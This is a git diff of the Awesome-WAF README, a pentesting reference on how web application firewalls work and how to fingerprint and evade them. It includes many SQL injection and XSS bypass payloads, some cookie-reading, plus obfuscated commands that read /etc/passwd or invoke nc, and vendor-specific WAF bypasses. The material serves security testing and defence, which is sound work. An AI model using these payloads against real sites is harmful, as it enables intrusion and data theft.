mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2025-01-03 13:30:03 +07:00
Added more stuff
This commit is contained in:
parent
6eae91aff8
commit
e1d0be8874
332
README.md
332
README.md
@ -10,19 +10,38 @@ __A Concise Definition:__ A web application firewall is a security policy enforc
|
|||||||
Feel free to [contribute](CONTRIBUTING.md).
|
Feel free to [contribute](CONTRIBUTING.md).
|
||||||
|
|
||||||
### Contents:
|
### Contents:
|
||||||
- [Awesome WAFs List](#awesome-waf-list)
|
- [Introduction](#introduction)
|
||||||
- [Awesome Testing Methodology](#testing-methodology)
|
- [How WAFs Work](#how-wafs-work)
|
||||||
- [Awesome WAF Detection](#waf-detection)
|
- [Operation Modes](#operation-modes)
|
||||||
- [Awesome Evasion Techniques](#evasion-techniques)
|
- [Testing Methodology](#testing-methodology)
|
||||||
- [Awesome Tools](#awesome-tools)
|
- [Where To Look](#where-to-look)
|
||||||
- [Awesome Blogs & Writeups](#blogs-and-writeups)
|
- [Detection Techniques](#detection-techniques)
|
||||||
|
- [WAF Fingerprints](#waf-fingerprints)
|
||||||
|
- [Evasion Techniques](#evasion-techniques)
|
||||||
|
- [Fuzzing/Bruteforcing](#fuzzingbruteforcing)
|
||||||
|
- [Regex Reversing](#regex-reversing)
|
||||||
|
- [Obfuscation/Encoding](#obfuscation)
|
||||||
|
- [Browser Bugs](#browser-bugs)
|
||||||
|
- [HTTP Header Spoofing](#request-header-spoofing)
|
||||||
|
- [Google Dorks Approach](#google-dorks-approach)
|
||||||
|
- [Known Bypasses](#known-bypasses)
|
||||||
|
- [Awesome Tooling](#awesome-tools)
|
||||||
|
- [Fingerprinting](#fingerprinting)
|
||||||
|
- [Testing](#testing)
|
||||||
|
- [Evasion](#evasion)
|
||||||
|
- [Blogs & Writeups](#blogs-and-writeups)
|
||||||
|
- [Video Presentations](#video-presentations)
|
||||||
- [Awesome Presentations & Papers](#presentations--research-papers)
|
- [Awesome Presentations & Papers](#presentations--research-papers)
|
||||||
|
- [Research Papers](#research-papers)
|
||||||
|
- [Presentation Slides](#presentations)
|
||||||
|
- [Licensing & Credits](#credits--license)
|
||||||
|
|
||||||
## How WAFs Work:
|
## Introduction:
|
||||||
|
### How WAFs Work:
|
||||||
- Using a set of rules to distinguish between normal requests and malicious requests.
|
- Using a set of rules to distinguish between normal requests and malicious requests.
|
||||||
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
|
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
|
||||||
|
|
||||||
## Operation Modes:
|
### Operation Modes:
|
||||||
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block web traffic that is clearly malicious, and signatures designed to prevent attacks which exploit certain website and web application vulnerabilities. Blacklisting model web application firewalls are a great choice for websites and web applications on the public internet, and are highly effective against an major types of DDoS attacks. Eg. Rule for blocking all `<script>*</script>` inputs.
|
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block web traffic that is clearly malicious, and signatures designed to prevent attacks which exploit certain website and web application vulnerabilities. Blacklisting model web application firewalls are a great choice for websites and web applications on the public internet, and are highly effective against an major types of DDoS attacks. Eg. Rule for blocking all `<script>*</script>` inputs.
|
||||||
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking possible cyber-attacks, but whitelisting will block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
|
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking possible cyber-attacks, but whitelisting will block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
|
||||||
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model is one that blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet.
|
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model is one that blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet.
|
||||||
@ -42,14 +61,14 @@ Feel free to [contribute](CONTRIBUTING.md).
|
|||||||
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
||||||
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
||||||
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
|
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
|
||||||
4. If there is some search box or input field somewhere, try detecting payloads like `<script>alert()</script>`.
|
4. If there is some input field somewhere, try with noisy payloads like `<script>alert()</script>`.
|
||||||
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
||||||
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
||||||
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
||||||
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
||||||
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
||||||
|
|
||||||
## WAF Detection
|
## WAF Fingerprints
|
||||||
Wanna detect WAFs? Lets see how.
|
Wanna detect WAFs? Lets see how.
|
||||||
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#awesome-tools).
|
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#awesome-tools).
|
||||||
|
|
||||||
@ -1426,13 +1445,14 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
|||||||
- Wordlists specifically for fuzzing
|
- Wordlists specifically for fuzzing
|
||||||
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
||||||
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
|
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
|
||||||
|
- [Other Payloads](https://github.com/foospidy/payloads)
|
||||||
|
|
||||||
#### Technique:
|
#### Technique:
|
||||||
- Load up your wordlist into fuzzer and start the bruteforce.
|
- Load up your wordlist into fuzzer and start the bruteforce.
|
||||||
- Record/log all responses from the different payloads fuzzed.
|
- Record/log all responses from the different payloads fuzzed.
|
||||||
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
|
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
|
||||||
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
|
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
|
||||||
- Always use proxies, since chances are real that your IP gets blocked.
|
- Always use proxychains, since chances are real that your IP gets blocked.
|
||||||
|
|
||||||
#### Drawbacks:
|
#### Drawbacks:
|
||||||
- This method often fails.
|
- This method often fails.
|
||||||
@ -1448,62 +1468,53 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
|||||||
|
|
||||||
### Keyword Filter Detection/Bypass
|
### Keyword Filter Detection/Bypass
|
||||||
|
|
||||||
__SQL Injection__
|
__Example__: SQL Injection
|
||||||
|
|
||||||
##### • Step 1:
|
##### • Step 1:
|
||||||
__Keyword filer__: `and`, `or`, `union`
|
__Keywords Filtered__: `and`, `or`, `union`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
|
|
||||||
- __Filtered Injection__: `union select user, password from users`
|
- __Filtered Injection__: `union select user, password from users`
|
||||||
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
||||||
|
|
||||||
##### • Step 2:
|
##### • Step 2:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
- __Filtered Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
||||||
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
|
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
|
||||||
|
|
||||||
##### • Step 3:
|
##### • Step 3:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select user from users limit 1) = 'admin'`
|
- __Filtered Injection__: `1 || (select user from users limit 1) = 'admin'`
|
||||||
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
||||||
|
|
||||||
##### • Step 4:
|
##### • Step 4:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
- __Filtered Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
||||||
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
|
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
|
||||||
|
|
||||||
##### • Step 5:
|
##### • Step 5:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
||||||
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
|
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
|
||||||
|
|
||||||
##### • Step 6:
|
##### • Step 6:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
||||||
- __Bypassed Injection__: `1 || user_id is not null`
|
- __Bypassed Injection__: `1 || user_id is not null`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
|
||||||
|
|
||||||
##### • Step 7:
|
##### • Step 7:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || substr(user,1,1) = unhex(61)`
|
- __Filtered Injection__: `1 || substr(user,1,1) = unhex(61)`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
||||||
|
|
||||||
##### • Step 8:
|
##### • Step 8:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
- __Filtered Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
||||||
- __Bypassed Injection__: `1 || lpad(user,7,1)`
|
- __Bypassed Injection__: `1 || lpad(user,7,1)`
|
||||||
|
|
||||||
##### • Step 9:
|
##### • Step 9:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
||||||
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
||||||
|
|
||||||
@ -1513,91 +1524,125 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
|
|||||||
- You can encode whole payload, or some parts of it and test recursively.
|
- You can encode whole payload, or some parts of it and test recursively.
|
||||||
|
|
||||||
#### Techniques:
|
#### Techniques:
|
||||||
__1. URL Encoding__
|
__1. Case Toggling__
|
||||||
|
- Some poorly developed WAFs filter selectively specific case WAFs.
|
||||||
|
- We can combine upper and lower case characters for developing efficient payloads.
|
||||||
|
|
||||||
|
__Standard__: `<script>alert()</script>`
|
||||||
|
__Bypassed__: `<ScRipT>alert()</sCRipT>`
|
||||||
|
|
||||||
|
__Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
|
||||||
|
__Bypassed__: `sELecT * FrOM all_tables whERe OwNeR = 'DATABASE_NAME'`
|
||||||
|
|
||||||
|
__2. URL Encoding__
|
||||||
- Encode normal payloads with % encoding/URL encoding.
|
- Encode normal payloads with % encoding/URL encoding.
|
||||||
- Can be done with online tools like [this](https://www.url-encode-decode.com/).
|
- Can be done with online tools like [this](https://www.url-encode-decode.com/).
|
||||||
- Burp includes a in-built encoder/decoder.
|
- Burp includes a in-built encoder/decoder.
|
||||||
|
|
||||||
Blocked: `<svG/x=">"/oNloaD=confirm()//`
|
__Blocked__: `<svG/x=">"/oNloaD=confirm()//`
|
||||||
Bypassed: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F`
|
__Bypassed__: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F`
|
||||||
|
|
||||||
Blocked: `.0union(select 1,2,3,4,5,6,7,8,9,10,11,12)`
|
__Blocked__: `uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)`
|
||||||
Bypassed: `%2e%30%75%4e%49%4f%6e%28%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%29`
|
__Bypassed__: `uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29`
|
||||||
|
|
||||||
__2. Unicode Encoding__
|
__3. Unicode Encoding__
|
||||||
- Most modern web-apps support UTF-8.
|
- Most modern web-apps support UTF-8 and hence are prone to this method.
|
||||||
- ASCII characters in unicode encoding encoding provide great variants for bypassing.
|
- ASCII characters in unicode encoding encoding provide great variants for bypassing.
|
||||||
|
- You can encode entire/part of the payload for obtaining results.
|
||||||
|
|
||||||
Standard: `prompt()`
|
__Standard__: `prompt()`
|
||||||
Obfuscated: `pro\u006dpt()`
|
__Obfuscated__: `pro\u006dpt()`
|
||||||
|
|
||||||
Standard: `../../appusers.txt`
|
__Standard__: `../../appusers.txt`
|
||||||
Obfuscated: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt`
|
__Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt`
|
||||||
|
|
||||||
__BONUS:__
|
__4. HTML Encoding__
|
||||||
If the application allows alternate charset interpretation, i.e. if the web app interprets `а` or `ā` as `a`,. the attack vectors get more diverse.
|
|
||||||
|
|
||||||
Standard: prompt()
|
|
||||||
Variant: рrомрt()
|
|
||||||
|
|
||||||
__3. HTML Encoding__
|
|
||||||
- Often web apps encode special characters into HTML encoding and render accordingly.
|
- Often web apps encode special characters into HTML encoding and render accordingly.
|
||||||
- This leads us to basic bypass cases with HTML encoding (numeric/generic).
|
- This leads us to basic bypass cases with HTML encoding (numeric/generic).
|
||||||
|
|
||||||
Standard: `"><img src=x onerror=confirm()>`
|
__Standard__: `"><img src=x onerror=confirm()>`
|
||||||
Encoded: `"><img src=x onerror=confirm()>` (General form)
|
__Encoded__: `"><img src=x onerror=confirm()>` (General form)
|
||||||
Encoded: `"><img src=x onerror=confirm()>` (Numeric reference)
|
__Encoded__: `"><img src=x onerror=confirm()>` (Numeric reference)
|
||||||
|
|
||||||
__4. Mixed Encoding__
|
__5. Mixed Encoding__
|
||||||
- WAF rules often tend to filter out a single type of encoding.
|
- WAF rules often tend to filter out a single type of encoding.
|
||||||
- This type of filters can be bypassed by mixed encoding payloads.
|
- This type of filters can be bypassed by mixed encoding payloads.
|
||||||
|
- Tabs and newlines further add to obfuscation.
|
||||||
|
|
||||||
Standard: `<script/src=data;text/javascript, alert()></script>`
|
__Obfuscated__:
|
||||||
Obfuscated: `<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74()></script>`
|
```
|
||||||
|
<A HREF="h
|
||||||
|
tt p://6 6.000146.0x7.147/">XSS</A>
|
||||||
|
```
|
||||||
|
|
||||||
__5. Using Comments__
|
__6. Using Comments__
|
||||||
- Comments obfuscate standard payload vectors.
|
- Comments obfuscate standard payload vectors.
|
||||||
- Different payloads have different ways of obfuscation.
|
- Different payloads have different ways of obfuscation.
|
||||||
|
|
||||||
Blocked: `<script>alert()</script>`
|
__Blocked__: `<script>alert()</script>`
|
||||||
Bypassed: `<!--><script>alert/**/()/**/</script>`
|
__Bypassed__: `<!--><script>alert/**/()/**/</script>`
|
||||||
|
|
||||||
Blocked: `/?id=1+union+select+1,2,3---`
|
__Blocked__: `/?id=1+union+select+1,2,3---`
|
||||||
Bypassed: `/?id=1+un/**/ion+sel/**/ect+1,2,3-`
|
__Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3-`
|
||||||
|
|
||||||
__6. Double Encoding__
|
__7. Double Encoding__
|
||||||
- Often WAF filters tend to encode characters to prevent attacks.
|
- Often WAF filters tend to encode characters to prevent attacks.
|
||||||
- However poorly developed filters (no recursion filters) can be bypassed with double encoding.
|
- However poorly developed filters (no recursion filters) can be bypassed with double encoding.
|
||||||
|
|
||||||
Standard: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
|
__Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
|
||||||
Obfuscated: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
|
__Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
|
||||||
|
|
||||||
Standard: `<script>alert('XSS')</script>`
|
__Standard__: `<script>alert('XSS')</script>`
|
||||||
Obfuscated: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E`
|
__Obfuscated__: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E`
|
||||||
|
|
||||||
__7. Wildcard Encoding__
|
__8. Wildcard Encoding__
|
||||||
- Globbing patterns are used by various command-line utilities to work with multiple files.
|
- Globbing patterns are used by various command-line utilities to work with multiple files.
|
||||||
- We can tweak them to execute system commands.
|
- We can tweak them to execute system commands.
|
||||||
- Specific to remote code execution vulnerabilities on linux systems.
|
- Specific to remote code execution vulnerabilities on linux systems.
|
||||||
|
|
||||||
Standard: `/bin/cat /etc/passwd`
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
Obfuscated: `/???/??t /???/??ss??`
|
__Obfuscated__: `/???/??t /???/??ss??`
|
||||||
Used chars: `/ ? t s`
|
Used chars: `/ ? t s`
|
||||||
|
|
||||||
Standard: `/bin/nc 127.0.0.1 1337`
|
__Standard__: `/bin/nc 127.0.0.1 1337`
|
||||||
Obfuscated: `/???/n? 2130706433 1337`
|
__Obfuscated__: `/???/n? 2130706433 1337`
|
||||||
Used chars: `/ ? n [0-9]`
|
Used chars: `/ ? n [0-9]`
|
||||||
|
|
||||||
__8. String Concatenation__
|
__9. String Concatenation__
|
||||||
- Different programming languages have different syntaxes and patterns for concatenation.
|
- Different programming languages have different syntaxes and patterns for concatenation.
|
||||||
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
||||||
|
|
||||||
Standard: `/bin/cat /etc/passwd`
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
Obfuscated: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
|
__Obfuscated__: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
|
||||||
> Bash allows path concatenation for execution.
|
> Bash allows path concatenation for execution.
|
||||||
|
|
||||||
Standard: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
||||||
Obfuscated: `<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>`
|
__Obfuscated__: `<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>`
|
||||||
|
|
||||||
|
__9. Junk Chars__
|
||||||
|
- Normal payloads get filtered out easily.
|
||||||
|
- Adding some junk chars avoid detection (specific cases only).
|
||||||
|
|
||||||
|
__Standard__: `<script>alert()</script>`
|
||||||
|
__Obfuscated__: `<script>+-+-1-+-+alert(1)</script>`
|
||||||
|
|
||||||
|
__Standard__: `<a href=javascript;alert()>ClickMe `
|
||||||
|
__Bypassed__: `<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe`
|
||||||
|
|
||||||
|
__10. Line Breaks__
|
||||||
|
- Many WAF with regex based filtering effectively blocks many attempts.
|
||||||
|
- Line breaks (CR/LF) can break firewall regex and bypass stuff.
|
||||||
|
|
||||||
|
__Standard__: `<iframe src=javascript:alert(0)">`
|
||||||
|
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">`
|
||||||
|
|
||||||
|
__11. Uninitialized Variables__
|
||||||
|
- Uninitialized bash variables can elude regular expression based filters and pattern match.
|
||||||
|
- Uninitialised variables have value null/they act like empty strings.
|
||||||
|
- Both bash and perl allow this kind of interpretations.
|
||||||
|
|
||||||
|
__Standard__: `cat /etc/passwd`
|
||||||
|
__Obfuscated__: `cat$u $u/etc$u/passwd$u`
|
||||||
|
|
||||||
### Browser Bugs:
|
### Browser Bugs:
|
||||||
#### Charset Bugs:
|
#### Charset Bugs:
|
||||||
@ -1606,12 +1651,12 @@ Obfuscated: `<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';
|
|||||||
|
|
||||||
Example request:
|
Example request:
|
||||||
<pre>
|
<pre>
|
||||||
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
|
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
|
||||||
Host: site.com
|
Host: site.com
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
|
||||||
<b>Accept-Charset:utf-32; q=0.5</b>
|
<b>Accept-Charset:utf-32; q=0.5</b>
|
||||||
Accept-Language: en-US,en;q=0.5
|
Accept-Language: en-US,en;q=0.5
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
</pre>
|
</pre>
|
||||||
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
||||||
then as the output encoding of the page is utf-8, it will be rendered as: `"<script>alert (1) </ script>`.
|
then as the output encoding of the page is utf-8, it will be rendered as: `"<script>alert (1) </ script>`.
|
||||||
@ -1703,13 +1748,35 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
|
|||||||
`site:pastebin.com +<wafname> bypass`
|
`site:pastebin.com +<wafname> bypass`
|
||||||
|
|
||||||
## Known Bypasses:
|
## Known Bypasses:
|
||||||
### __Cloudflare__
|
### Citrix NetScaler
|
||||||
|
- HTTP Parameter Pollution (NS10.5) [@BGA Security](https://www.exploit-db.com/?author=7396)
|
||||||
|
```
|
||||||
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
|
||||||
|
<soapenv:Header/>
|
||||||
|
<soapenv:Body>
|
||||||
|
<string>’ union select current_user, 2#</string>
|
||||||
|
</soapenv:Body>
|
||||||
|
</soapenv:Envelope>
|
||||||
|
```
|
||||||
|
|
||||||
|
- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654)
|
||||||
|
```
|
||||||
|
/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cloudflare
|
||||||
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
|
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
|
||||||
```
|
```
|
||||||
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
|
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
|
||||||
```
|
```
|
||||||
|
|
||||||
### __Barracuda__
|
### Comodo
|
||||||
|
- SQLi by [@WAFNinja](https://waf.ninja)
|
||||||
|
```
|
||||||
|
0 union/**/select 1,version(),@@datadir
|
||||||
|
```
|
||||||
|
|
||||||
|
### Barracuda
|
||||||
- Cross Site Scripting by [@WAFNinja](https://waf.ninja)
|
- Cross Site Scripting by [@WAFNinja](https://waf.ninja)
|
||||||
```
|
```
|
||||||
<body style="height:1000px" onwheel="alert(1)">
|
<body style="height:1000px" onwheel="alert(1)">
|
||||||
@ -1725,36 +1792,6 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
|
|||||||
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
|
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
|
||||||
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
|
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
|
||||||
|
|
||||||
### __Imperva SecureSphere__
|
|
||||||
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
|
|
||||||
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
|
|
||||||
```
|
|
||||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
|
||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
